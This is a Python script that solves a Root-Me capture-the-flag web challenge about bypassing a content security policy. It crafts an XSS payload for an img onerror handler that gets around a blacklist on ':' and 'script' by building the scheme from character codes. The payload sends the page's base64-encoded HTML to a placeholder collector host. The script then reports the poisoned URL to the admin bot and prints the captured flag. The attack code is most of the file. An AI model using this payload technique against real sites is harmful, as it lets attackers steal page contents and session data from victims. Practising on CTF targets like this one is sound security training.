- from urllib.parse import quote_plus, urljoin, urlparse, quote, unquote, unquote_to_bytes, quote_from_bytes
- import requests
# Browser-like request headers attached to every request this script sends.
# Accept-Encoding, Connection and Host are deliberately not listed here and
# are left for the HTTP client to fill in. Insertion order is preserved, so
# the headers go out on the wire in the order given below.
headers = dict((
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'),
    ('Accept-Language', 'en-US,en;q=0.9'),
    ('Cache-Control', 'no-cache'),
    ('Pragma', 'no-cache'),
    ('Upgrade-Insecure-Requests', '1'),
    ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36'),
))
def debug(resp):
    """Print the full attribute dictionary of *resp* to stdout.

    Used as an ad-hoc inspection aid for the response objects returned by
    the request helpers below. Everything stored on the object is dumped,
    so for an HTTP response this is verbose and typically includes the body.
    """
    attributes = resp.__dict__
    print(attributes)
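def create_form(user, debug_=False, *, timeout=30):
    """GET the challenge page with *user* passed as the ``user`` query parameter.

    Args:
        user: Value for the ``user`` query-string parameter; requests
            percent-encodes it when building the URL.
        debug_: When true, dump the response object with ``debug``.
        timeout: Seconds to wait for the connection and the response. The
            original call had no timeout, so a stalled server could block the
            script indefinitely; 30 s is a chosen default, adjust as needed.

    Returns:
        The ``requests.Response`` for the GET; ``resp.url`` holds the final,
        percent-encoded request URL.

    Raises:
        ``requests.RequestException`` (including ``requests.Timeout``) on
        network failure or when *timeout* elapses.
    """
    url = 'http://challenge01.root-me.org/web-client/ch8/page'
    # `headers` is a module-level dict that is only read here, so no
    # `global` declaration is required.
    resp = requests.request(
        "GET",
        url=url,
        params={'user': user},
        headers=headers,
        timeout=timeout,
    )
    if debug_:
        debug(resp)
    return resp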
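def report_admin(url, debug_=False, *, timeout=30):
    """POST *url* to the challenge's report endpoint as the ``url`` form field.

    Args:
        url: The URL submitted in the form body.
        debug_: When true, dump the response object with ``debug``.
        timeout: Seconds to wait for the connection and the response. The
            original call had no timeout and could block indefinitely on a
            stalled server; 30 s is a chosen default, adjust as needed.

    Returns:
        The ``requests.Response`` for the POST; ``resp.text`` is the
        server's reply body.

    Raises:
        ``requests.RequestException`` (including ``requests.Timeout``) on
        network failure or when *timeout* elapses.
    """
    url_admin = 'http://challenge01.root-me.org/web-client/ch8/report'  # report endpoint (POST)
    # `headers` is a module-level dict that is only read here, so no
    # `global` declaration is required.
    resp = requests.request(
        "POST",
        url_admin,
        data={"url": url},
        headers=headers,
        timeout=timeout,
    )
    if debug_:
        debug(resp)
    return resp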
if __name__ == '__main__':
    ## <img src=x onerror='alert(1)'>
    ## black list ':', 'script'
    # Placeholder for the host that will receive the request made by the
    # onerror handler; it has to be replaced before the script is useful.
    collector = 'hacker_domain'
    # Value submitted as the `user` parameter. NOTE(review): the author's
    # notes above describe a character/keyword denylist on the challenge
    # page; the flag text at the bottom suggests the page's CSP still
    # permits inline event handlers. On the defensive side, the fix is
    # context-aware output encoding plus a CSP that forbids inline handlers,
    # not a longer denylist.
    payload = f'''<img src=x onerror="document.location=('htt'.concat(String.fromCharCode(112,115,58,47,47)).concat('{collector}/?c=').concat(escape(btoa(document.body.innerHTML))))">'''
    # craft = f'''<img src=x onerror="document.location=('//{domain_hacker}?c='+window.btoa(document.getElementsByClassName("message")[0].innerHTML)>'''
    # requests percent-encodes the parameter; the URL is decoded back to its
    # raw form before being reported, presumably because the report endpoint
    # is expected to receive the payload un-encoded.
    reported_url = unquote(create_form(payload).url)
    print(reported_url)
    print(report_admin(reported_url).text)
    ## CSP_34SY_T0_BYP4S_W1TH_SCR1PT